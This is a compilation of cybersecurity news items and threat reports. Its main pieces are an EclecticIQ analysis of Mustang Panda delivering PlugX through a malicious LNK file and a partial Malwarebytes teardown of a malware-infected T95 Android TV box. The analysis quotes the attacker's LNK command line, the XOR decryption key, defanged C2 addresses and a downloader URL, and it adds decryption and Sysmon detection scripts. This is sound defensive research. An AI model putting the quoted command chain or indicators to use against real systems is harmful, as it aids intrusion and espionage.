
Cisco patches a command injection vulnerability. NIST issues antiphishing guidance. HeadCrab malware’s worldwide distribution campaign. The Gamaredon APT is more interested in collection than destruction. Kathleen Smith of ClearedJobs.Net looks at hiring trends in the cleared community. Bennett from Signifyd describes the fraud ring that’s launched a war on commerce against U.S. merchants. And trends in cyberattacks by state-sponsored actors.

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/22

Selected reading.

Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover (Dark Reading)

Phishing Resistance – Protecting the Keys to Your Kingdom (NIST) 

OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK (Proofpoint)

HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign (Aquasec) 

Another UAC-0010 Story (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

Russia-backed hacker group Gamaredon attacking Ukraine with info-stealing malware (The Record from Recorded Future News)

City of London traders hit by Russia-linked cyber attack (The Telegraph)

ChristianaCare recovers from cyberattack, restores website service (6abc Philadelphia) 

Nation-State Threats and the Rise of Cyber Mercenaries: Exploring the Microsoft Digital Defense Report (CSO Online)

Microsoft Digital Defense Report 2022 (Microsoft Security)


The campaign illustrates another option for miscreants who had relied on Microsoft macros

Malvertising attacks are being used to distribute virtualized .NET loaders that are highly obfuscated and dropping info-stealer malware.…

Context

Prilex has been active since at least 2014 and evolved from an automated teller machine (ATM) malware into a POS malware in 2016, primarily targeting Brazilian and South American retailers. In 2022, the malware evolved further, conducting fraudulent “GHOST transactions” using EMV cryptograms generated by payment cards during the payment process.

In previous cases, the threat actors behind Prilex used phone-based social engineering techniques for initial access, posing as technical support vendors, then installing Prilex on compromised hosts after being granted access.

Technical Analysis

According to Kaspersky researchers, “Prilex now implements a rule-based file that specifies whether or not to capture credit card information and an option to block NFC-based transactions.” Researchers assess that this capability is intended to force the target to insert their physical card into the reader so the malware can capture payment data.

Kaspersky did not provide public indicators of compromise (IOCs) for the newly discovered versions.

Community Impact

In May 2021 and February 2022, unspecified US retailers reported the Prilex malware targeting their systems. The expansion of the malware into the US indicates that over time, Prilex could potentially become a more prevalent threat to POS-operating organizations with operations in the US.

 


A new version of the Prilex POS malware has found a novel way to steal your credit card information.

The post Prilex POS malware evolves to block contactless transactions appeared first on TechRepublic.


Since September 2021, about a thousand Redis servers have been infected by new stealthy malware meant to hunt down unprotected Redis servers online and create a botnet that mines for the Monero cryptocurrency. The malware, nicknamed HeadCrab by Aqua Security experts Nitzan Yaakov and Asaf Eitani, has so far infected at least 1,200 of these servers, which […]

EXECUTIVE SUMMARY

Since at least 2019, the Mustang Panda threat actor group has targeted government and public sector organizations across Asia and Europe [3] with long-term cyberespionage campaigns in line with strategic interests of the Chinese government.
In November 2022, Mustang Panda shifted from using archive files to using malicious optical disc image (ISO) files containing a shortcut (LNK) file to deliver the modified version of PlugX malware. This switch increases the evasion against anti-malware solutions [2].
The Mustang Panda APT group loads the PlugX malware in the memory of legitimate software by employing a four-stage infection chain which leverages malicious shortcut (LNK) files, triggering execution via dynamic-link library (DLL) search-order-hijacking.

PLUGX MALWARE EXECUTION FLOW

Figure 1 – Execution flow of PlugX malware.

First Stage: PlugX Malware Delivered by ISO Image

In the first stage of the infection chain, EclecticIQ researchers assess that the malware was almost certainly delivered by a malicious email with an ISO image attachment. The ISO image contains a shortcut (LNK) file disguised as a DOC file called “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc”.

The malicious LNK file contains a command line argument that runs when the user opens the file (User Execution), starting the PlugX malware execution chain.

The command line argument of “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc” is shown below:

C:\Windows\System32\cmd.exe /q /c "System Volume Information\test2022.ucp"

The test2022.ucp portion of the command line argument is a renamed copy of a legitimate executable originally called LMIGuardianSvc.exe. This executable is abused to perform DLL hijacking and to load the initial PlugX loader, called LMIGuardianDll.dll. The legitimate executable and the malicious DLL are placed in the same directory (System Volume Information) so that the DLL hijacking succeeds.

Figure 2 – Command line argument of malicious shortcut (LNK) file.

Figure 3 – PlugX malware loader execution file path.

Second Stage: DLL Hijacking Execution Chain to Load PlugX Malware

When a victim clicks on the shortcut file, it executes the command line argument described in the first stage. The renamed LMIGuardianSvc.exe (test2022.ucp) then automatically loads LMIGuardianDll.dll, the PlugX loader, from the same directory; this is the DLL hijacking technique. Upon execution of the PlugX loader a Microsoft Office Word document opens, named “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.docx”. This is a decoy document to trick the user into thinking there is no malicious activity.

One example of the Word document can be seen in the image below:

Figure 4 – A decoy Word document is used for social engineering. The victim sees a real Word document open after clicking on a shortcut (LNK) file that has a Word document icon.

The process tree below shows the execution of the legitimate application LMIGuardianSvc.exe, which is executed twice from a new directory (AppData\Roaming\SamsungDriver) created by the malware and used for persistent access on the infected device.

Figure 5 – Captured process tree during the execution of the malicious shortcut (LNK) file which masquerades as a Word document.

Encrypted shellcode named LMIGuardianDat.dat contains PlugX malware:  

Figure 6 – Encrypted PlugX shellcode in a hex editor.

The PlugX malware loader decrypts the encrypted shellcode (LMIGuardianDat.dat) and loads it inside the LMIGuardianSvc.exe process. The injected memory region can be extracted to perform further analysis of the decrypted PlugX malware.

Figure 7 – Memory map of LMIGuardianSvc.exe.

LMIGuardianDLL.dll (PlugX Loader) decrypts the LMIGuardianDAT.dat and loads it in memory of the legitimate process.

Figure 8 – Decompiled PlugX loader contains the decryption function.

During static analysis, EclecticIQ analysts identified that the PlugX malware loader used a simple XOR algorithm to decrypt the LMIGuardianDAT.dat (XOR encrypted PlugX shellcode) to avoid signature-based detection from antimalware solutions.

Figure 9 – XOR key is stored statically to perform decryption at execution time of the PlugX loader.

The PlugX loader used a static XOR key, “0x47F”, to decrypt the PlugX shellcode. The image below shows a Python script being used to decrypt LMIGuardianDAT.dat.
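As an added analyst-side example (not the script shown in the report's figure, nor EclecticIQ code), the following Python reverses a static repeating-key XOR layer like the one described above. It assumes the reported key “0x47F” is applied as a little-endian 16-bit word (the report does not state the key width, so the width is a parameter), and it adds a known-plaintext key-recovery helper for the case where a sibling sample has already been decrypted and its first bytes are known. All inputs in the demo are constructed.

```python
"""Analyst helper: undo a static repeating-key XOR layer on a captured blob."""
from pathlib import Path
from typing import Optional


def key_from_literal(literal: str, width: int = 2) -> bytes:
    """Turn a key written as a hex literal (the report gives "0x47F") into
    key bytes. ASSUMPTION: the loader applies the key as a little-endian
    16-bit word, so "0x47F" becomes b"\\x7f\\x04". The report does not state
    the width, so it is a parameter rather than a fixed value."""
    value = int(literal, 16)
    return value.to_bytes(width, "little")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` against `key` repeated; XOR is its own inverse, so the same
    call both applies and removes the layer."""
    if not key:
        raise ValueError("key must not be empty")
    klen = len(key)
    return bytes(b ^ key[i % klen] for i, b in enumerate(data))


def recover_repeating_key(ciphertext: bytes, known_prefix: bytes,
                          key_len: int) -> Optional[bytes]:
    """Known-plaintext recovery: if the first `key_len` plaintext bytes are
    known, the key is ciphertext XOR plaintext. Returns None if that guess
    does not reproduce the rest of `known_prefix`."""
    if len(known_prefix) < key_len or len(ciphertext) < len(known_prefix):
        return None
    key = bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))
    for i in range(key_len, len(known_prefix)):
        if ciphertext[i] ^ key[i % key_len] != known_prefix[i]:
            return None
    return key


def decrypt_file(src: str, dst: str, key: bytes) -> int:
    """Decrypt `src` into `dst`; returns the number of bytes written."""
    plain = xor_bytes(Path(src).read_bytes(), key)
    Path(dst).write_bytes(plain)
    return len(plain)


if __name__ == "__main__":
    # Constructed demo data; no real sample is needed for the round trip.
    key = key_from_literal("0x47F")
    fake_payload = b"\x55\x8b\xec" + b"CONSTRUCTED-TEST-PAYLOAD" * 3
    blob = xor_bytes(fake_payload, key)
    assert xor_bytes(blob, key) == fake_payload
    recovered = recover_repeating_key(blob, fake_payload[:6], 2)
    print("recovered key:", recovered.hex() if recovered else None)
```

Because a single-byte or two-byte XOR is a byte-value permutation, it does not lower the entropy of the blob, so a plain entropy check will not confirm a correct decryption; a known prefix, or a recognizable stub in the decrypted output, is what an analyst should look for.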

10Figure 10 – Decrypted PlugX shellcode.

Once the PlugX malware has been executed in-memory, the C2 config is decrypted. The C2 IP address 217[.]12[.]206[.]116 and the campaign ID of “test2022” are seen in the figures below:

Figure 11 – Decompiled PlugX malware contains the campaign ID as a fingerprint of the attack to categorize the victims.

Figure 12 – Decompiled PlugX malware contains the command and control (C2) IP address as a static value.

Third Stage: Registry Run Key Persistence

Mustang Panda abuses Windows registry run keys to gain persistence on the infected system. On Windows operating systems the run registry keys execute the specified program when a user logs on to the device.  

The PlugX malware created a new run key called LMIGuardian Update, shown in the image below.

Figure 13 – Persistence established by malware after writing a new Run key.

Every logon will cause the Windows registry run key to execute the LMIGuardianSvc.exe, triggering the DLL Hijacking that leads to PlugX malware execution.  

Figure 14 – Written registry key.

The malware creates a new directory, which the persistence mechanism (Run key) then uses to execute LMIGuardianSvc.exe from that specific path:

Figure 15 – New file path created for persistence execution of PlugX malware.

Fourth Stage: Command and Control Connection

After a successful execution of PlugX malware, it connects to a remote C2 server which is used to send commands to compromised systems via the PlugX malware and to receive exfiltrated data from a target network.  

Figure 16 – Request headers and server response observed in Mustang Panda’s customized PlugX variant.

Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system. The ‘Sec-Dest’ and ‘Sec-Site’ HTTP headers carry encrypted victim machine information sent to the attackers.

Figure 17 – Network capture during the TCP request to the remote C2 server over port 443.

The C2 IP address 217[.]12[.]206[.]116 was seen hosting another service on port 8088 with a unique SSL certificate that is itself issued to the IP address 45[.]134[.]83[.]29, which is identified as additional Mustang Panda infrastructure, according to the BlackBerry Research & Intelligence Team [1].

Figure 18 – Issued SSL certificate contains another IP address, which was used by the Mustang Panda APT group for previous attacks. [1]

Conclusion

EclecticIQ analysts assess it is almost certain the APT group Mustang Panda was responsible for this attack. Mustang Panda has leveraged PlugX malware in previous campaigns targeting Ukraine and has used similar TTPs such as DLL hijacking. The group previously used Windows shortcut (LNK) files disguised using double extensions (such as .doc.lnk) with a Microsoft Word icon and has abused registry run keys for persistence. The SSL certificate used in this attack overlaps with previous Mustang Panda activity targeting Ukraine.

Figure 19 – Example of an LNK phishing lure used by the Mustang Panda APT group in previous attacks. [2]

EclecticIQ analysts assess it is probable the target for this lure document was a European entity. The phishing lure used in the campaign discusses the effect EU sanctions against Russia will have on the European Union. Mustang Panda has targeted European organizations before, in a similar campaign on 2022-10-26 [Figure 19]. The Mustang Panda APT group continues to be a highly active threat group conducting cyber operations targeting organizations across Europe [2]. EclecticIQ analysts have identified Mustang Panda operators adding new evasion techniques, such as using a custom malware loader to execute an encrypted PlugX sample, for the purpose of increasing infection rates and staying under the radar while performing cyber espionage activities against victims.

EclecticIQ analysts assess that it is probable Mustang Panda will increase their activity and continue to use similar TTPs in response to geopolitical developments in Ukraine and Europe, based on an examination of the group’s previous cyberespionage activity. Analysts should continue to track Mustang Panda using the TTPs and infrastructure highlighted in the report and the YARA rules provided below.

Mitigations  

Implement basic incident response and detection deployments and controls like network IDS, netflow collection, host-logging, and web proxy, alongside human monitoring of detection sources.
Employ host-based controls.
Filter email correspondence and monitor for malicious attachments.
Identify critical data and implement additional network segmentation and special protections for sensitive information, such as multifactor authentication, highly restricted access, and storage systems only accessible via an internal network.
Create alerts for disk image file types, such as ISO, and shortcut files, which have been increasingly abused by different threat actors. Furthermore, organizations should consider disabling auto-mounting of ISO or VHD files.
Configure intrusion detection systems (IDS), intrusion prevention systems (IPS), or any other network defence mechanisms in place to alert on connection attempts from unrecognized external IP addresses and domains and, upon review, consider blocking them.
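The second and third stages above (a renamed binary launched from System Volume Information, a DLL side-loaded from the same user-writable directory, and a Run key pointing into AppData\Roaming) each leave a distinct host telemetry trace, which is what the host-logging and alerting mitigations rely on. The following Python is an added example, not EclecticIQ's hunting content: it runs three such checks over constructed Sysmon-style JSON events (field names follow Sysmon event IDs 1, 7 and 13; every value is invented for the demo, including the user name and SID).

```python
"""Detection over Sysmon-style events for the LNK -> cmd.exe -> renamed
binary -> side-loaded DLL -> Run key persistence chain described above."""
import json
from typing import Dict, Iterable, List, Tuple

# Directories where a legitimately installed service binary and its DLLs
# should not live: user-writable, or abnormal for executables altogether.
SUSPICIOUS_DIRS = (
    "\\system volume information\\",
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
)

Finding = Tuple[int, str]  # (event index, rule name)


def _parent_dir(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def _in_suspicious_dir(path: str) -> bool:
    return any(marker in path.lower() for marker in SUSPICIOUS_DIRS)


def detect(events: Iterable[Dict]) -> List[Finding]:
    findings: List[Finding] = []
    for idx, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 1:  # process creation
            image = ev.get("Image", "")
            cmdline = ev.get("CommandLine", "")
            if "system volume information\\" in (image + " " + cmdline).lower():
                findings.append((idx, "exec_from_system_volume_information"))
        elif eid == 7:  # image (DLL) load
            image = ev.get("Image", "")
            loaded = ev.get("ImageLoaded", "")
            # A DLL loaded from the executable's own directory, when that
            # directory is user-writable, is the search-order-hijack pattern.
            if (loaded.lower().endswith(".dll")
                    and _parent_dir(loaded) == _parent_dir(image)
                    and _in_suspicious_dir(loaded)):
                findings.append((idx, "possible_dll_search_order_hijack"))
        elif eid == 13:  # registry value set
            target = ev.get("TargetObject", "")
            details = ev.get("Details", "")
            if "\\currentversion\\run\\" in target.lower() and _in_suspicious_dir(details):
                findings.append((idx, "run_key_to_user_writable_path"))
    return findings


def detect_lines(lines: Iterable[str]) -> List[Finding]:
    """Parse JSON-lines telemetry and run the rules over it."""
    return detect(json.loads(line) for line in lines if line.strip())


# Constructed sample telemetry (not captured from the campaign).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /q /c \"System Volume Information\\test2022.ucp\""},
    {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "E:\\System Volume Information\\test2022.ucp",
     "CommandLine": "\"System Volume Information\\test2022.ucp\""},
    {"EventID": 7,
     "Image": "C:\\Users\\alice\\AppData\\Roaming\\SamsungDriver\\LMIGuardianSvc.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Roaming\\SamsungDriver\\LMIGuardianDll.dll"},
    {"EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LMIGuardian Update",
     "Details": "C:\\Users\\alice\\AppData\\Roaming\\SamsungDriver\\LMIGuardianSvc.exe"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\alice\\Documents\\notes.docx\""},
    {"EventID": 13,
     "TargetObject": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for idx, rule in detect_lines(SAMPLE_LOG.splitlines()):
        print(f"event {idx}: {rule}")
```

The benign Word launch and the OneDrive Run key pass without findings, so the rules key on the abnormal location rather than on the file names, which an operator can rename at will.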

MITRE ATT&CK

Tactic: Technique | ATT&CK Code
Execution: User Execution: Malicious File | T1204
Defense Evasion: Hijack Execution Flow: DLL Search Order Hijacking | T1574.001
Defense Evasion: Deobfuscate/Decode Files or Information | T1140
Defense Evasion: Masquerading: Double File Extension | T1036.007
Command-and-Control: Encrypted Channel: Symmetric Cryptography | T1573.001
Command-and-Control: Data Encoding: Standard Encoding | T1132.001
Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001

INDICATORS OF COMPROMISE

Sample File Name(s) | SHA-256 Hash
LMIGuardianDll.dll | ee2c8909089f53aafc421d9853c01856b0a9015eba12aa0382e98417d28aef3f
LMIGuardianDat.dat | 8c4926dd32204b6a666b274a78ccfb16fe84bbd7d6bc218a5310970c4c5d9450
draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.iso | 723d804cfc334cad788f86c39c7fb58b42f452a72191f7f39400cf05d980b4f3
draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc.lnk | 2c0273394cda1b07680913edd70d3438a098bb4468f16eebf2f50d060cdf4e96
LMIGuardianSvc.exe renamed (test2022.ucp) | 26c855264896db95ed46e502f2d318e5f2ad25b59bdc47bd7ffe92646102ae0d

Command and Control Servers
217[.]12[.]206[.]116
45[.]134[.]83[.]29

Hunting Resources: Live Queries & Yara Rules

 

About EclecticIQ Intelligence & Research Team

EclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence & Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.


Appendix

[1] https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets
[2] https://www.recordedfuture.com/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant
[3] https://twitter.com/ESETresearch/status/1400165767488970764

The post Mustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware appeared first on Security Boulevard.


At least 1,200 Redis database servers worldwide have been corralled into a botnet using an “elusive and severe threat” dubbed HeadCrab since early September 2021.
“This advanced threat actor utilizes a state-of-the-art, custom-made malware that is undetectable by agentless and traditional anti-virus solutions to compromise a large number of Redis servers,” Aqua security researcher Asaf Eitani 


We analyze an infection campaign targeting organizations in the Middle East for cyberespionage in December 2022 using a new backdoor malware. The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers.

Detect Malware in Container Images

As organizations continue to adopt containers and Kubernetes for their applications, the need to secure these containers becomes increasingly important. Many applications are built with third-party sourced components from public image registries. Attackers are privy to the growing use of these third-party image registries, and often target them with malware, thus requiring special attention. At VMware, we define malware as the broad category name for harmful code used in cyberattacks that affect laptops, desktops, servers, mobile devices, and, more recently, IoT devices. Some of the most common examples of malware include

Viruses
Bots
Ransomware

When using malware, attackers typically have a set target and goal in mind and use malware as a mechanism to gain access and/or information.

As malware continues to pose a huge risk when developing new modern applications, organizations must scan these images for these specific types of attacks from build to run to ensure the security and integrity of their application.

Malware Scanning with VMware Carbon Black Container

With VMware Carbon Black Container, customers can now scan all executable files in their containerized applications to detect malicious files and malware. Just like vulnerabilities and Kubernetes workload posture, users can now scan images for malware at runtime and in the build phase through CI/CD integration.

Users can now:

Detect suspicious files in all containerized applications
Alert on or block containers and workloads with suspicious files during the CI/CD pipeline
Use the image scan log to review all scan activities, including file reputation scan information for all scan types
Deny workloads and images affected by malware through a policy
Manage a list of customer-provided hashes of known malware to utilize CBC enforcement capabilities
Explore detected malware in more depth and decide whether or not to exclude it

Increased Visibility

Figure 1: Updated Widgets on the Image Scanning Dashboard

With the updated image scanning dashboard, users can analyze and detect all relevant files in a given container for the first time. This newly added malware widget enables users to quickly identify suspicious files alongside critical vulnerabilities so they can be remediated as quickly as possible. This valuable and actionable data can be viewed across teams in the VMware Carbon Black dashboard, helping to increase visibility and reduce friction.

Figure 2: New Suspicious Files Tab with Identified Malware

The new malware scanning capabilities allow users to easily identify the origin of the file by identifying the layer and even the command(s) that contain malware for easy resolution.

As we know, it is important to catch suspicious activity as soon as possible to remediate and reduce risk. Users are now able to use cbctl to scan containers during the build phase to detect containers with suspected or banned files and to block risky containers early in the SDLC.

Additional Resources

For more information, check out our technical release notes and the VMware Carbon Black Container page.

The post Malware Detection in Container Images appeared first on VMware Security Blog.


A new phishing campaign abuses OneNote documents to infect computers with the infamous AsyncRAT malware, targeting users in the U.K., Canada and the U.S.

The post OneNote documents spread malware in several countries appeared first on TechRepublic.

HeadCrab Attacks Servers Worldwide with a Novel State-of-the-Art Redis Malware

Aqua Nautilus researchers discovered a new elusive and severe threat that has been infiltrating and residing on servers worldwide since early September 2021. Known as HeadCrab, this advanced threat actor utilizes a state-of-the-art, custom-made malware that is undetectable by agentless and traditional anti-virus solutions to compromise a large number of Redis servers. The HeadCrab botnet has taken control of at least 1,200 servers. 


FortiGuard Labs analyzes malicious code found in captured excel documents that cryptojacks a victim’s system to mine for Monero cryptocurrency. See how the malicious software is delivered, executed, and the techniques it uses to gain persistence on a device.


This blog post highlights the recent malvertising campaigns targeting Google searches that deploy info-stealer malware. It covers the attackers’ techniques and provides a list of indicators of compromise. Recommendations for the general public are also included to help mitigate the risk of falling victim to such attacks.

With Malware Protection, you can scan once at the edge and prevent malware from draining your time and budget.

Threat actors have found a 'workaround' for distributing malware after Microsoft disabled macros by default in e-mail. It works via the OneNote notebook application, which admittedly does not support macros, but a user can instead insert attached files into a notebook. When the file is double-clicked, the attachment launches. In these cases the attachments are malicious VBS files, so the script starts automatically on double-click, and malware can then be downloaded from an external website.


Threat actors have begun using OneNote attachments in phishing e-mails that can infect computers with malware. Notably, this malware can provide remote access and can be used to install more malware or steal passwords or crypto wallets.

This is reported by Bleeping Computer.


A couple of weeks ago, security news outlets made their rounds reporting on an Android TV box available on Amazon that came pre-installed with malware. The findings came from a Canadian developer, Daniel Milisic, who posted on his GitHub. What Daniel found was an Android T95 TV box infected with malware right out of the box!

Immediately, I recognized some of the apps that put up red flags, such as Adups. Under those circumstances, there’s only one logical thing a curious mobile malware researcher can do—I put in an IT Helpdesk request to buy a malware infested TV box! (For the record, I do not recommend putting in such a request at a non-information security company.)

The following is my analysis after days of obsessing over this little black box.

Toolset

Before we continue with my analysis, let me explain some of the tools I used so that when they are referenced it makes more sense. This is for the average reader who is not a tech nerd like myself. If you are technically inclined and want to skip to the good stuff, head down to the section Getting to the Core(java) of the case.

Android Debug Bridge (adb)—I have referenced this command line tool many times in the past. It is your best friend into easily sending commands to an Android device via Windows, Mac, or Linux environments. It’s part of Android Studio, but unless you plan to develop an Android app, I recommend just grabbing the Android SDK Platform Tools. I have a great writeup on the Malwarebytes Forum on how to install adb and use it to remediate preinstalled malware.
Telerik Fiddler Classic—Fiddler is an Internet traffic monitor with powerful HTTPS capturing capabilities. Most other internet traffic monitors can’t show details of HTTPS connections, because it is encrypted.  The powers of Fiddler can capture that traffic by installing a special certificate onto the device. Then by proxying internet traffic through a Windows machine, you can see otherwise private HTTPS traffic. The best part is it doesn’t require root access. That is unless you have a stubborn TV Box with no place in Settings to install certificates. Although more painful, there is a workaround to install with root access.
NoRoot Firewall—This handy app allows or denies network traffic based on each individual app. More importantly, it also logs the traffic from each app, giving you a good baseline of what to look for in Internet traffic monitors. Although noisy at first, because you have to initially allow or deny every app that connects to the Internet, it’s worth it if your goal is to stop unwanted Internet traffic from particular apps in their tracks.
Logcat —Good old Logcat! Another tool referenced quite often. This command line tool outputs logs of just about everything going on with an Android device.

Rooted in evil 

The first sign that something was not right with this TV box was the fact that it has a toggle switch for root access. (Hint: If you buy a TV box from Amazon Prime and it has a “Root switch” toggle, use the Prime free return policy right away.)


Whether the toggle switch is on or off, I am pretty sure it doesn’t matter because the box is rooted regardless.

To clarify, rooting in the context of Android devices means attaining the highest level of access—known as “root”. Among other things, this gives you the ability to modify system level directories and files, something regular Android users can’t do. This heightened access is made available mainly for developers who need access to test in a pre-production environment.

Once in production, Android devices are not rooted. In fact, if you run the command adb root on a production Android device, you get an error message stating adbd cannot run as root in production builds. On a rooted device, the message is restarting adbd as root or adbd is already running as root.

Important Warning: Rooting an Android device that is in production and thus does not have root access is very dangerous and can result in bricking the device, leaving it forever broken. In addition, allowing root access gives every app on the phone root access, including malware! We highly recommend you do not root your Android device. However, since the T95 TV box was already rooted, I used root for analysis and remediation.

Shell games

Another thing I should mention before moving on is a word about shell. Shell refers to interacting with the Linux command line. Since all Android devices are based on Linux, you can access the shell to run common Linux commands, along with other Android-specific commands installed on the device.

You can do this via the adb command shell. For example, if you want to list all packages on an Android device, you could run pm list packages -f on the shell. You can do this in two ways. More commonly, you might tunnel the command using adb shell pm list packages -f. Or you can first go to the shell by using command adb shell, and then run pm list packages -f.

In this instance, the name of the shell on the T95 TV Box is walleye. The name of the shell changes based on the Android device’s manufacturer and model. Note that this is another oddity with the T95 TV Box. As a matter of fact, the shell name walleye is stolen from a Pixel 2 with the same name. (This information comes in handy later on.)

Okay, now that we have gone through the tedious details, let’s get to the good stuff!

Getting to the Core(java) of the case

Daniel references in his GitHub the existence of a directory /data/system/Corejava. Testing with other Android devices I have sitting around confirms this directory should not exist, including on a Pixel 2 (the box has the same shell name as a Pixel 2: walleye).

If /data/system/Corejava was a common directory, surely the Pixel 2 with the same shell name as the T95 TV box would have this directory? Daniel also provides the contents of /data/system/Corejava from his T95 TV box. It contains an infected classes.dex file. Looking at my own T95 TV box, it in fact contains the same malicious directories and files:


The classes.dex is a DEX file that contains the compiled bytecode for an app to run. Every app, which is called an Android Package Kit (APK) on Android, contains a classes.dex file, along with other directories and files required for the classes.dex to load and run.

Therefore, there must be an APK installed for this classes.dex to work.

My next step was to analyze this malicious DEX file found in /data/system/Corejava, which I will call Corejava classes.dex for clarity.

Corejava classes.dex’s code contained a lot of references to using internet traffic: GET commands, POST commands, HTTP, HTTPS, etc. Looking at the VirusTotal results of the Corejava classes.dex found in my own T95 TV box aligned with it being a Trojan Downloader. The clearest evidence of this were URLs in the code. One of them was a malicious URL associated with other malicious DEX files and APKs:

hxxps://dy.kr.wildpettykiwi.info/dykr/update

With this evidence, I moved on to collecting network traffic.

Exploring the network traffic

When I am looking into network traffic, my very first step is installing NoRoot Firewall, as referenced in the Toolset section above. Looking at the logs of NoRoot, it appeared the T95 TV box had quite a bit of traffic coming from DGBLuancher.


This was of interest considering DGBLuancher, package name com.swe.dgbluancher, does not contain any references to using Internet traffic in the code.

Much of the traffic from DGBLuancher used port 443, which is for HTTPS traffic. Per the Toolset section, I think the best choice of network traffic monitors is Telerik Fiddler Classic. Capturing only an hour of traffic using Fiddler produced a massive list of entries!

The majority of the traffic came from random non-malicious news sites and ad sites. All of this was happening in the background, unseen, until you capture the Internet traffic! To be clear, this is malicious clicker activity, which generates revenue from pay-per-click ads.

But wait, there was more!

There was also a sprinkling of malicious URLs, including but not limited to malicious URLs from the code of Corejava classes.dex.

Tying it all together

Backing up, let’s look at the evidence so far. We have DGBLuancher with no evidence within the code of using Internet traffic capabilities, and we have Corejava classes.dex with lots of evidence within the code of using Internet traffic capabilities. And yet capturing Internet traffic shows a correlation to DGBLuancher, but with URLs from Corejava classes.dex.

My hypothesis was that DGBLuancher was the culprit APK loading and running Corejava classes.dex, but more testing needed to be done.

So, I first uninstalled DGBLuancher, but kept Corejava classes.dex. The result? Malicious Internet traffic stopped. Ergo, Corejava classes.dex cannot run without DGBLuancher.

Next, I reinstalled DGBLuancher and removed Corejava classes.dex. Again, malicious Internet traffic stopped. DGBLuancher could not produce malicious Internet traffic on its own. It needed Corejava classes.dex.

The obvious conclusion was that DGBLuancher was indeed the APK loading and running Corejava classes.dex!

If that wasn’t enough evidence, there was even more. If I deleted Corejava classes.dex from the /data/system/Corejava, it magically reappeared. This happened immediately after a reboot or if I simply waited long enough.  But, if I uninstalled DGBLuancher, Corejava classes.dex stops reappearing. With all the evidence, I had DGBLuancher dead to rights. It was the culprit loading and running Corejava classes.dex. 

The malicious behavior of DGBLuancher lands it with the classification of Android/Trojan.Downloader.CoreJava.T95. Despite this detection, Malwarebytes for Android cannot remediate due to DGBLuancher being a system app. For steps to remediate, see the Remediation section below.

The mystery of Corejava

Once I had established that DGBLuancher creates Corejava classes.dex, the next mystery was: What was creating /data/system/Corejava and the rest of its contents? You see, even when DGBLuancher was uninstalled, after removing /data/system/Corejava, it would appear again. Everything except for the Corejava classes.dex file, of course.

Looking at what process was creating /data/system/Corejava, it appeared to be a process called system_server. (Note that depending on where you look, it can also be called system_process.)

By using the command logcat | grep system_server in shell, I confirmed that system_server did a lot more than just create /data/system/Corejava. In fact, it seemed to run many of the most important tasks. You can really see how important system_server is by terminating it, which crashes the device (I do not recommend this).

The obvious conclusion was that system_server was a generic system process used by many other elements to run commands in the background. As a matter of fact, DGBLuancher uses system_server to create Corejava classes.dex. Anything from a script to another app could be using system_server to create /data/system/Corejava; system_server is not the culprit itself, just a conduit.

With this information, I did everything from analyzing system level bash scripts on the device, looking for keywords such as Corejava within every file, to uninstalling apps to see if it resolved.

The only thing I neglected doing was uninstalling apps that would compromise the functionality of the device. After all, if the TV box cannot function, what’s the point of remediating? It pains me to say that this one is going to have to remain a mystery for now. This is no matter, since with DGBLuancher uninstalled the malware is neutralized. In addition, Daniel finds a clever way to stop the recreation that we will address below.

Remediation

Factory reset

I strongly recommend restarting the T95 TV box from a fresh factory reset before proceeding to remediation. If you’ve been using the TV box for a while, there’s a good chance other malware could have been downloaded during that time. As a result of resetting to factory, all of this will be removed, but keep in mind this will also erase all non-system related items on the device.

To factory reset the T95:

Go to the Gear icon for the settings screen
Navigate to More Settings
Navigate to Device Preferences
Scroll down to bottom and press Reset

Read the warning, and proceed with Reset if you’re willing to go ahead

After the reset, do not connect the T95 TV box to a network just yet. Don’t do this until you have gone through remediating DGBLuancher in the next section. This will prevent any malware being installed via network download. 

Using adb

The first place you should start is installing adb onto a Windows, Mac, or Linux environment. (Check the Toolset section above on how to install.) Next, you will need to put the T95 TV box into Developer Mode and turn on USB0 device mode.


Go to the Gear icon for the settings screen
Navigate to About
